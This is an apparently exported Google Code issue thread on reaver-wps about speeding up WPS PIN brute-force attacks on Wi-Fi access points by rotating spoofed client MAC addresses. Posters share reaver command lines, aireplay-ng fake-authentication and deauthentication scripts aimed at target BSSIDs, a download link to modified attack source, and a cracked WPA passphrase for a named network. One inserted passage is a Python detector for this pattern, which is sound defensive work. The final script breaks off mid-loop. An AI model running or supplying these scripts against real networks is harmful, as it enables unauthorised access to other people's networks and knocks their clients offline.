pizheng / reaver-wps

Automatically exported from code.google.com/p/reaver-wps

MAC Address last character changer to speed up the attack #258

Open GoogleCodeExporter opened 9 years ago

GoogleCodeExporter commented 9 years ago
Please describe the feature you would like to be implemented into Reaver.
English only.

MAC Address last character changer to speed up the attack.

Well, sometimes the AP will reject the "EAPOL Request" after a successful pin 
try. I made some tests with simultaneous reaver instances running with 
different MACs (the -m argument), and when one instance gets "WARNING: Receive 
timeout occurred", the other gets "Received identity request" and continues the 
cracking.

The problem with this method is: the reaver tool doesn't support simultaneous 
instances (ok, I read the FAQ about it). If you run two reaver instances, for 
example, the two instances will try the same pin at the same time.

I made some changes to the reaver source code. Look at the output after my changes:

[+] Using MAC BC:99:47:B7:03:E9
[+] Trying pin 00485678
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received M3 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Using MAC BC:99:47:B7:03:E8
[+] Trying pin 00495677
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Using MAC BC:99:47:B7:03:E7 
[+] Trying pin 00505673
...

On the first try, reaver is using the client MAC "BC:99:47:B7:03:E9" (it is not 
a real MAC, I'm just using it for the example), on the second, 
"BC:99:47:B7:03:E8", on the third, "BC:99:47:B7:03:E7". Well, after the use of 
the MAC "BC:99:47:B7:03:E0", reaver will start again at "BC:99:47:B7:03:E9".

The numbers:

With this method: (13 seconds/pin)
Without this method: (31 seconds/pin)

If the development team wants, I can send my modified source code.

Thanks,
Bob

Original issue reported on code.google.com by gabrielr...@gmail.com on 2 Mar 2012 at 4:36

GoogleCodeExporter commented 9 years ago
Would be a nice improvement - every pin/different mac. 

Original comment by music.an...@gmail.com on 2 Mar 2012 at 7:04

GoogleCodeExporter commented 9 years ago
Great! Can you share your modified source code Bob?

Original comment by itmanvn on 3 Mar 2012 at 2:29

GoogleCodeExporter commented 9 years ago
Yes, of course.

Reaver WPS 1.4 with MAC Changer - LINK - 
http://www.4shared.com/archive/AHxJ4rDm/reaver-14-mac-changertar.html

Example of use:

reaver -i mon0 -b AA:BB:CC:DD:EE:FF -M
or
reaver -i mon0 -b AA:BB:CC:DD:EE:FF --mac-changer

What I recommend:

reaver -i mon0 -b AA:BB:CC:DD:EE:FF --mac-changer --no-nacks --win7 --no-associate -vv

To associate more effectively, I recommend using the aireplay-ng tool. Create an 
"associate.sh" file, and put this inside:

aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:ZF &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:ZE &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:ZD &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:ZC &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:ZB &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:ZA &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z9 &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z8 &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z7 &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z6 &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z5 &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z4 &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z3 &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z2 &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z1 &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z0 &

PS: Change AA:BB:CC:DD:EE:FF to the BSSID and ZZ:ZZ:ZZ:ZZ:ZZ:Z to your MAC 
(without the last digit).

Before using the reaver tool, just type "sh associate.sh". To kill all the 
aireplay-ng processes, type "killall aireplay-ng".

If you have success using this method, please share it with us to improve 
reaver WPS more and more.

Thanks,
Bob

Original comment by gabrielr...@gmail.com on 5 Mar 2012 at 3:11

GoogleCodeExporter commented 9 years ago
I still don't understand. Like the author said, the wifi usually doesn't block 
your MAC address, it does not have the MAC address table. I mean for regular 
wifi. But what it is, is it locks WPS instead... Please, someone clarify this.

Original comment by ryanl33x...@ymail.com on 5 Mar 2012 at 5:17

GoogleCodeExporter commented 9 years ago
Well, I don't know why or how the AP rejects the "EAPOL Request", but, with the 
method I suggested, I retrieved the PIN from some APs with a better speed than 
normal. My intention in sharing the code is to 
allow other people to try with other APs and confirm if this method works or 
not.

In my case, when reaver got a successful pin try, some APs reject the "EAPOL 
Request" for some seconds, but only for the MAC that tried. It isn't a WPS 
lock, because I can continue trying PINs. I got this behavior with TP-LINK and 
D-Link APs.

Original comment by gabrielr...@gmail.com on 5 Mar 2012 at 2:53

GoogleCodeExporter commented 9 years ago
Hi Bob,

Tried your method but no luck. I use an Alfa AWUS036H and the AP is a Linksys.

[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred

The only way that still works with this AP is:

1. aireplay-ng -1 10 -a 00:23:69:XX:XX:XX -e Hitech mon3 --ignore-negative-one
2. reaver -A -b 00:23:69:XX:XX:XX -c 6 -vv -i mon3 --dh-small --no-nacks --ignore-locks --win7 -d 25

But this is too slow :(

Original comment by itmanvn on 5 Mar 2012 at 4:08

GoogleCodeExporter commented 9 years ago
Hello,

ryanl33x1511: I found the answer! Some APs deauthenticate the client that tried 
a pin. With the MAC Changer method, when one MAC is deauthenticated (and 
aireplay-ng takes time to authenticate it again), another one is trying a new pin.

itmanvn: Are you using aireplay-ng to authenticate all the MACs? Like the 
associate.sh that I suggested. And you have to check if your wireless card 
supports the injection of packets with MACs different from your original one.

Regards,
Bob

Original comment by gabrielr...@gmail.com on 8 Mar 2012 at 3:17
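The behaviour Bob describes in this comment and in the opening post (one PIN attempt per client MAC, the MAC rotating through its last hex digit BC:99:47:B7:03:E9, E8, E7 ... while the AP deauthenticates the MAC that just tried) is also the signature a wireless IDS or an AP's own log can key on. The following is an added detection example written for this thread; it is not code from reaver-wps or from any poster. It assumes a constructed event log of `time,event,client_mac` lines; the event names `assoc`, `eapol_start`, `wps_nack` and `deauth` are placeholders for this example, not any real tool's output format. Rule 1 flags a "MAC family" (addresses differing only in the last nibble) accumulating WPS NACKs; rule 2 covers the non-rotating case of one MAC failing at roughly one PIN per second, which is the `-d 0 -t 1` speed reported later in the thread.

```python
"""Detect WPS PIN guessing from 802.11 events, including last-nibble MAC rotation.

Added example for this thread (not reaver-wps code). Input is a constructed
log of "time,event,client_mac" lines; event names are placeholders.
"""
from collections import defaultdict, deque
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    ts: float
    kind: str
    mac: str


def parse_events(lines):
    """Parse 'time,event,client_mac' lines into time-ordered Events (comments skipped)."""
    events = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, kind, mac = (field.strip() for field in line.split(","))
        events.append(Event(float(ts), kind.lower(), mac.upper()))
    return sorted(events, key=lambda e: e.ts)


def mac_family(mac):
    """Everything but the last hex digit: BC:99:47:B7:03:E9 -> 'BC:99:47:B7:03:E'."""
    return mac[:-1]


def detect_rotating_wps_bruteforce(events, window=120.0, min_variants=4, min_failures=6):
    """Rule 1: alert once per MAC family when, inside a sliding window of `window`
    seconds, at least `min_failures` WPS NACKs come from at least `min_variants`
    distinct MACs that differ only in their last hex digit."""
    recent = defaultdict(deque)  # family -> deque of (ts, mac) for wps_nack events
    alerted, alerts = set(), []
    for ev in events:
        if ev.kind != "wps_nack":
            continue
        fam = mac_family(ev.mac)
        q = recent[fam]
        q.append((ev.ts, ev.mac))
        while ev.ts - q[0][0] > window:  # drop NACKs older than the window
            q.popleft()
        variants = {m for _, m in q}
        if fam not in alerted and len(q) >= min_failures and len(variants) >= min_variants:
            alerted.add(fam)
            alerts.append({"rule": "wps_bruteforce_mac_rotation", "family": fam + "?",
                           "variants": sorted(variants), "failures_in_window": len(q),
                           "window_start": q[0][0], "window_end": ev.ts})
    return alerts


def detect_single_mac_wps_bruteforce(events, window=60.0, min_failures=10):
    """Rule 2: a single client MAC failing WPS PIN attempts at high rate."""
    recent = defaultdict(deque)  # mac -> deque of wps_nack timestamps
    alerted, alerts = set(), []
    for ev in events:
        if ev.kind != "wps_nack":
            continue
        q = recent[ev.mac]
        q.append(ev.ts)
        while ev.ts - q[0] > window:
            q.popleft()
        if ev.mac not in alerted and len(q) >= min_failures:
            alerted.add(ev.mac)
            alerts.append({"rule": "wps_bruteforce_single_mac", "mac": ev.mac,
                           "failures_in_window": len(q),
                           "window_start": q[0], "window_end": ev.ts})
    return alerts


def build_sample_log(rotate):
    """Constructed sample log (not captured data).
    rotate=True : one attempt every 13 s, each from the next MAC down (E9, E8, ...).
    rotate=False: twelve attempts from one fixed MAC, one second apart."""
    lines = ["# time,event,client_mac (constructed)"]
    t = 1000.0
    for i in range(8 if rotate else 12):
        mac = f"BC:99:47:B7:03:E{9 - i:X}" if rotate else "BC:99:47:B7:03:E9"
        lines += [f"{t},assoc,{mac}", f"{t + 0.2},eapol_start,{mac}",
                  f"{t + 0.5},wps_nack,{mac}", f"{t + 0.6},deauth,{mac}"]
        t += 13 if rotate else 1
    lines.append("1010,assoc,00:11:22:33:44:55")  # unrelated client, one association
    return lines


def run_rules(lines):
    """Run both rules over a log and return all alerts."""
    events = parse_events(lines)
    return detect_rotating_wps_bruteforce(events) + detect_single_mac_wps_bruteforce(events)


if __name__ == "__main__":
    for rotate in (True, False):
        for alert in run_rules(build_sample_log(rotate)):
            print(alert)
```

Both rules key on the WPS NACK (a failed PIN half) rather than on association alone, so a client that merely re-associates many times does not trip them; the thresholds are starting points and should be tuned against the legitimate WPS traffic of the site.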

GoogleCodeExporter commented 9 years ago
Hi Bob,

It was my mistake, I put in the wrong AP MAC :)). Just hacked a D-Link AP. The 
Linksys still does not improve in speed with mac-changer.

[+] 100.00% complete @ 2012-03-07 17:24:41 (8 seconds/pin)
[+] Pin cracked in 34667 seconds
[+] WPS PIN: '32456394'
[+] WPA PSK: 'vnxkthuy'
[+] AP SSID: 'VanHung_Network'

Anyway, with --mac-changer, reaver cannot crack the WPA PSK, it just shows the 
WPS PIN. I have to remove --mac-changer and then use -pin to get the WPA PSK.

Original comment by itmanvn on 8 Mar 2012 at 4:46

GoogleCodeExporter commented 9 years ago
Hi,

It seems that using the --mac-changer method took me some time compared to the 
normal -d 0 -t 1 method that I used.

--mac-changer: [+] 45.02% complete @ 2012-03-28 03:23:18 (39 seconds/pin)
-d 0 -t 1: [+] 45.06% complete @ 2012-03-28 03:24:40 (1 seconds/pin)

But it seems that the aireplay arguments helped.

Just my 1c.

Original comment by syakir on 27 Mar 2012 at 7:25

GoogleCodeExporter commented 9 years ago
Is there any chance you could reupload the reaver 1.4 with mac changer, as 
the link seems to be dead?

Original comment by mighty-s...@hotmail.co.uk on 8 Apr 2012 at 9:05

GoogleCodeExporter commented 9 years ago
Hi mighty,

The 4shared link is working, but I uploaded to hotfile for you:

https://hotfile.com/dl/152186405/f53e87e/reaver-1.4-mac-changer.tar.gz.html

Regards,
Bob

Original comment by gabrielr...@gmail.com on 9 Apr 2012 at 2:27

GoogleCodeExporter commented 9 years ago
I get "The file link that you requested is not valid." on 4shared; also just 
downloaded the hotfile one and it says it's corrupt.

Original comment by mighty-s...@hotmail.co.uk on 9 Apr 2012 at 5:47

GoogleCodeExporter commented 9 years ago
Never mind, redownloaded and all working fine, thank you.

Original comment by mighty-s...@hotmail.co.uk on 9 Apr 2012 at 5:54

GoogleCodeExporter commented 9 years ago
I'm running bt5r2 x86 desktop, updated, using the modified reaver 1.4 with mac 
changer.

ok this was tricky for me with wusb600n v2 (RT3572)

you still have to use the "-m" option along with the NEW "-M"
the -m needs to be the same as what is set with 'ifconfig wlan0 hw ether' for me

everything working good with the mac changer addon.
thanks

Original comment by tdbo...@gmail.com on 29 Apr 2012 at 5:05

GoogleCodeExporter commented 9 years ago
Hello,

Thank you "tdbone1" for sharing your experience, you are right, to use another 
MAC you need the "-m" option, sorry I haven't specified it before.

Regards,
Bob

Original comment by gabrielr...@gmail.com on 30 Apr 2012 at 12:24

GoogleCodeExporter commented 9 years ago
Would this help for "warning ap rate limiting"? If so it would be nice to be 
able to change the mac when rate limiting does occur. The AP I'm experimenting with 
accepts +-30 pins and then I have to wait 301 seconds before I can continue the 
attack. I'll try reaver on a different machine/mac when the target AP is in 
rate limiting (because of the attack with machine 1). 

peace

Original comment by kasperka...@gmail.com on 9 Jun 2012 at 8:55

GoogleCodeExporter commented 9 years ago
ok I did the test and changing the mac address won't help if the ap is blocked 
due to rate limiting.

peace

Original comment by kasperka...@gmail.com on 9 Jun 2012 at 9:47

GoogleCodeExporter commented 9 years ago
I suggest you read the Musket Team 361 entry concerning MAC codes and reaver. 
There are numerous comments on the web concerning reaver locked on the first 
pin and going nowhere. The 361 comments solve this, but since this deals with 
mac codes we thought you might be interested. We have ONLY been playing with 
this attack for 48 hours so we were focused on just getting the program to give 
us a result. Your variable mac code approach though is intriguing. We are so 
new to this program that we do not want to comment further. We were going to 
try mac spoofing an associated client to see how this increased the results. 
Maybe you will get there before us.
  Bring What Is Hidden Into View
  Musket Team A (a group of hackers and remote viewers) 

Original comment by muske...@yahoo.com on 30 Jul 2012 at 4:13

GoogleCodeExporter commented 9 years ago
#!/bin/bash
# !!!!!   Script runs in continuous loop TO STOP THIS SCRIPT open a new terminal window and type killall aireplay-ng    !!!!
#                          Script designed to be run during a reaver attack
# For historical reference previous scripts sending variable macs seemed to flood the router with association requests
# slowing down the router's ability to respond during a reaver attack
# This script allows the user to set transmission rates and only send one(1) mac code at a time.
# The script is designed for use with Backtrack5(BT5).
# For BT5 users, copy the file to the /usr/bin/ folder and type variablemacs.sh in a terminal window.
# This script file sends a constantly changing MAC Code to the target AP during
# a reaver attack. You can alter the time, transmission rate and seconds to reauth by changing the variables
# You can run wash then reaver and open airodump-ng on the same channel as reaver then run variablemacs.sh
#
#                          Before you start the program
# Change Target MAC variable within "" to your Target AP and then save the variablemacs.sh file to the /usr/bin folder
# Make sure the red "" remains around your mac variable entry
# And Again remember to save to the /usr/bin folder after changes are made.
# If you mess up the variables list a copy as comments can be found below
######################################################################
# TARGET="00:1F:5B:8A:47:48" = Arouter, 00:26:75:3E:DD:6C = Brouter
# VARMAC="00:11:22:33:44:5" # Do not alter this unless you understand the program logic
# MON="mon0"  Can be changed if your virtual monitor is different
# TIME="120" # Seconds to reauthenticate
# TRATE="150" # Transmission rate
# DELAY="1m"  # Time process active 30s 1m 2m etc
# The # = REM or remarks or comments. The Computer ignores this
#######################################################################
# Below are the script variables
#
TARGET="00:26:75:3E:DD:6C" # Change the mac code to your target!!!!!!!!
VARMAC="00:11:22:33:44:5"  # Do not change unless you understand the coding logic
MON="mon0" # Do not change this unless your virtual monitor is not designated as mon0
TIME="120" # Seconds to reauthenticate
TRATE="150" # Transmission rate
DELAY="1m"  # Time process active 30s 1m 2m etc
# Note below the 00:11:22:33:44:55 mac has been turned off as it is the same mac we are using with reaver 1.4
#
for (( ; ; ))
do
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"0"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"0" --ignore-negative-one $MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"1"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"1" --ignore-negative-one $MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"2"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"2" --ignore-negative-one $MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"3"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"3" --ignore-negative-one $MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"4"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"4" --ignore-negative-one $MON & sleep $DELAY; kill $!
# echo X
# echo XXXXXXXXXXXXXXXXXXX
# echo STARTING $VARMAC"5"
# echo XXXXXXXXXXXXXXXXXXX
# Remarked out as this is the mac used by reaver
# aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"5" --ignore-negative-one $MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"6"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"6" --ignore-negative-one $MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"7"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"7" --ignore-negative-one $MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"8"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"8" --ignore-negative-one $MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"9"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"9" --ignore-negative-one $MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"A"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"A" --ignore-negative-one $MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"B"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"B" --ignore-negative-one $MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"C"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"C" --ignore-negative-one $MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"D"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"D" --ignore-negative-one $MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"E"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"E" --ignore-negative-one $MON & sleep $DELAY; kill $!
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"F"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"F" --ignore-negative-one $MON & sleep $DELAY; kill $!
done

Original comment by muske...@yahoo.com on 31 Jul 2012 at 8:36

GoogleCodeExporter commented 9 years ago
Hello Musket Team A,

Thank you for the script, it will be useful for everybody. 

I used my method of attack during 2 months, and the results are very good. Some 
people have talked about the rate limiting, but this attack is not to bypass 
the rate limiting, this attack is to bypass the delay that the aireplay-ng 
needs to re-authenticate a MAC that tried a PIN. While the aireplay-ng 
re-authenticates the MAC, the reaver-wps is using another MAC to try another 
PIN.

Please, tell us if you find another results and thank you again for the script.

Regards,
Bob

Original comment by gabrielr...@gmail.com on 31 Jul 2012 at 7:49

GoogleCodeExporter commented 9 years ago
We have found a small bug in the program. Once started, the program runs 
constantly in the background regardless of the killall aireplay-ng command. We 
are still testing this approach. We are exploring spoofing an associated 
client's mac and mixed short deauth signals embedded in this mac changing 
program running continuously. When the signal is weak the router seems to get 
confused and only a reaver program restart sometimes and/or a short deauth 
burst like aireplay-ng -0 10 a. target AP mon0 seems to straighten things out 
and get the program moving again.
   Please note we are field testers working with these tools in the real world and are not trying to redo the fantastic work of the authors of reaver, whom we hold in high regard.

Musket Team Alpha

Original comment by muske...@yahoo.com on 1 Aug 2012 at 1:00

GoogleCodeExporter commented 9 years ago
#!/bin/bash
#                          Bash Script sends variable mac codes and embedded deauth to target
#                                  Script designed to be run during a reaver attack
# !!!!!   Script runs in a loop TO STOP THIS SCRIPT open a new terminal window and type killall aireplay-ng    !!!!
#
# Use this program to unstick routers when EAPOL warning messages or reception timeouts occur randomly during attack
# Many times a stalled reaver attack begins to function the moment the first deauth in the loop is sent.
# This script allows the user to set transmission rates and only send one(1) mac code at a time.
# The script is designed for use with Backtrack5(BT5).
# For BT5 users, copy the file to the /usr/bin/ folder and type variablemacs01.sh in a terminal window.
# You can alter the time, transmission rate and seconds to reauth, number of deauths and number of loops by changing the variables
# You can run wash then reaver and open airodump-ng on the same channel as reaver then run variablemacs.sh
# Make sure when running airodump-ng that you run it with the channel -c command set to the same channel as reaver
# If a mistake is made stop reaver, stop airodump-ng and then restart reaver etc.
#
# Setup before starting
# Change Target MAC variable within "" to your Target AP and then save the variablemacs01.sh file to the /usr/bin folder
# Make sure the red "" remains around your mac variable entry
# And Again remember to save to the /usr/bin folder after changes are made.
# If you mess up the variables list a copy as comments can be found below
######################################################################
# TARGET="00:1F:5B:8A:47:48"
# VARMAC="00:11:22:33:44:5" # Do not alter this unless you understand the program logic
# MON="mon0"  Can be changed if your virtual monitor is different
# TIME="120" # Seconds to reauthenticate
# TRATE="150" # Transmission rate
# DELAY="1m"  # Time process active 30s 1m 2m etc
# DEAUTH="20" # Number of Deauths
# COUNT="5" # Set number of loops required. Note with the following variables set one(1) loop = approx 5 minutes
# The # = REM or remarks or comments. The Computer ignores echo X
#
#######################################################################
# Below are the script variables
#
TARGET="00:26:75:41:49:6C" # Change the mac code to your target!!!!!!!!
VARMAC="00:11:22:33:44:5"  # Do not change unless you understand the coding logic
MON="mon0" # Do not change this unless your virtual monitor is not designated as mon0
TIME="120" # Seconds to reauthenticate
TRATE="150" # Transmission rate
DELAY="1m"  # Time process active 30s 1m 2m etc
DEAUTH="20" # Number of Deauths - we currently use 20 as 30 was too long and 10 too short for the routers we attack
COUNT="25" # Number of loops required. Note with the following variables set one(1) loop = approx 5 minutes
#
while [ $COUNT -gt 0 ]; do
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"0"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"0" --ignore-negative-one $MON & sleep $DELAY; killall aireplay-ng
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"1"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"1" --ignore-negative-one $MON & sleep $DELAY; killall aireplay-ng
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"2"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"2" --ignore-negative-one $MON & sleep $DELAY; killall aireplay-ng
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"3"
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -1 $TIME -x $TRATE -a $TARGET -h $VARMAC"3" --ignore-negative-one $MON & sleep $DELAY; killall aireplay-ng
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $DEAUTH'deauths'
echo XXXXXXXXXXXXXXXXXXX
aireplay-ng -0 $DEAUTH -a $TARGET $MON & sleep $DELAY; killall aireplay-ng
echo XXXXXXXXXXXXXXXXXXXXXXXXX
echo Value of count is: $COUNT
echo XXXXXXXXXXXXXXXXXXXXXXXXX
echo XXXXXXXXXXXXXX END OF LOOP XXXXXXXXXXXXXX
let COUNT=COUNT-1
done

Original comment by muske...@yahoo.com on 1 Aug 2012 at 6:13

GoogleCodeExporter commented 9 years ago
variablemac01.sh update
Allows users to run program and input mac code of target from terminal window.

#!/bin/bash
#                          Bash Script sends variable mac codes and embedded deauth to target
#                                  Script designed to be run during a reaver attack
# !!!!!   Script runs in a loop TO STOP THIS SCRIPT open a new terminal window and type killall aireplay-ng    !!!!
#
# Use this program to unstick routers when EAPOL warning messages or reception timeouts occur randomly during attack
# Many times a stalled reaver attack begins to function the moment the first deauth in the loop is sent.
# This script allows the user to set transmission rates and only send one(1) mac code at a time.
# The script is designed for use with Backtrack5(BT5).
# For BT5 users, copy the file to the /usr/bin/ folder and type variablemacs01.sh in a terminal window.
# You can alter the time, transmission rate and seconds to reauth, number of deauths and number of loops by changing the variables
# You can run wash then reaver and open airodump-ng on the same channel as reaver then run variablemacs.sh
# Make sure when running airodump-ng that you run it with the channel -c command set to the same channel as reaver
# If a mistake is made stop reaver, stop airodump-ng and then restart reaver etc.
#
#
######################################################################
# TARGET="00:1F:5B:8A:47:48" Note: entered by keyboard commands
# VARMAC="00:11:22:33:44:5" # Do not alter this unless you understand the program logic
# MON="mon0"  Can be changed if your virtual monitor is different
# TIME="120" # Seconds to reauthenticate
# TRATE="150" # Transmission rate
# DELAY="1m"  # Time process active 30s 1m 2m etc
# DEAUTH="20" # Number of Deauths
# COUNT="5" # Set number of loops required. Note with the following variables set one(1) loop = approx 5 minutes
# The # = REM or remarks or comments. The Computer ignores echo X
#
#######################################################################
# Below are the script variables
# Keyboard Entry Target AP MAC Entry
#
while true

do
echo ''
echo '     Bash Script sends variable mac codes and embedded deauth to target'
echo '            Script designed to be run during a reaver attack'
echo '     Other variables such as number of loops must be set in script file'
echo '     =================================================================='
echo ''
echo '             !!!!!Before continuing complete the following!!!!!'
echo ''
echo '     STOP wash and START reaver on the appropriate channel'
echo '          of Target AP in a separate terminal window'
echo ''
echo '     Start airodump-ng in separate terminal window'
echo ''
echo '     Example =  airodump-ng -c channel of target AP  mon0'
echo ''
echo '     !!Channel in reaver must equal = channel in airodump-ng!!'
echo '                    !!or reaver will fail!!'
echo '                    ========================'
echo ''

  echo -n "Please confirm Press y to continue..Press n to abort!!..Press any other key to try again:"

  read CONFIRM
  case $CONFIRM in
    y|Y|YES|yes|Yes) break ;;
    n|N|no|NO|No)
      echo Aborting - you entered $CONFIRM
      exit
      ;;

  esac
done
echo You entered $CONFIRM.  Continuing ...

while true

do
echo ''
echo ''
echo ''
echo -n "Enter your target's mac code >"

read TARGET
echo "You entered: $TARGET"

  echo -n "Please confirm Press y to continue..Press n to abort!!..Press any other key to try again:"
  echo ''
  read CONFIRM
  case $CONFIRM in
    y|Y|YES|yes|Yes) break ;;
    n|N|no|NO|No)
      echo Aborting - you entered $CONFIRM
      exit
      ;;
  esac
done
echo You entered $CONFIRM.  Continuing ...

#TARGET="20:AA:4B:A7:FD:87" # Change the mac code to your target, entered by keyboard commands!!!!!!!!
VARMAC="00:11:22:33:44:5"  # Do not change unless you understand the coding logic
MON="mon0" # Do not change this unless your virtual monitor is not designated as mon0
TIME="120" # Seconds to reauthenticate
TRATE="150" # Transmission rate
DELAY="1m"  # Time process active 30s 1m 2m etc
DEAUTH="20" # Number of Deauths - we currently use 20 as 30 was too long and 10 too short for the routers we attack
COUNT="100" # Number of loops required. Note with the following variables set one(1) loop = approx 5 minutes
#
while [ $COUNT -gt 0 ]; do
echo X
echo XXXXXXXXXXXXXXXXXXX
echo STARTING $VARMAC"0"
echo Number of loops remaining = $COUNT
echo XXXXXXXXXXXXXXXXXXX
echo X
